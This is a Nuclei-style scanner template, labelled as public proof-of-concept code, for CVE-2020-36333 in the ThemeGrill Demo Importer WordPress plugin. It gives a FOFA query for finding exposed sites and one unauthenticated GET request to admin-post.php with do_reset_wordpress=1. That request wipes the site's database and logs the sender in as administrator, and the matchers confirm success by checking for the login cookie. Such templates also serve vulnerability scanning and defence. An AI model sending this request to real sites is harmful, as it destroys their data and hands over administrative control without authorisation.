ThemeGrill Demo Importer before 1.6.2 does not require authentication for wiping the database due to a reset_wizard_actions hook. In versions 1.3.4 and above and versions 1.6.1 and below, there is a vulnerability that allows any unauthenticated user to wipe the entire database to its default state after which they are automatically logged in as an administrator.
PoC代码[已公开]
id: CVE-2020-36333
info:
name: ThemeGrill Demo Importer < 1.6.2 - Database Reset
author: iamnoooob,pdresearch
severity: critical
description: |
ThemeGrill Demo Importer before 1.6.2 does not require authentication for wiping the database due to a reset_wizard_actions hook. In versions 1.3.4 and above and versions 1.6.1 and below, there is a vulnerability that allows any unauthenticated user to wipe the entire database to its default state after which they are automatically logged in as an administrator.
reference:
- https://www.openwall.com/lists/oss-security/2020/02/19/1
- https://nvd.nist.gov/vuln/detail/CVE-2020-36333
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
cvss-score: 9.1
cve-id: CVE-2020-36333
cwe-id: CWE-285
epss-score: 0.47302
epss-percentile: 0.97626
metadata:
verified: true
max-request: 1
product: themegrill-demo-importer
vendor: themegrill
fofa-query: body="/plugins/themegrill-demo-importer"
tags: cve,cve2020,wp,wordpress,wp-plugin,themegrill
http:
- raw:
- |+
GET /wp-admin/admin-post.php?do_reset_wordpress=1 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'len(body)==0'
- 'status_code == 302'
- 'contains_all(header, "wordpress_logged_in_", "reset=true")'
condition: and
# digest: 4a0a00473045022100b9686d6d05b54f6e9130820c99b799a346edeb31560ad3624f12687555c8f8c70220698596f8c8dd71b155d5e9880adece526043a62f9b0e109a95d1e2965f51dd21:922c64590222798bb761d5b6d8e72950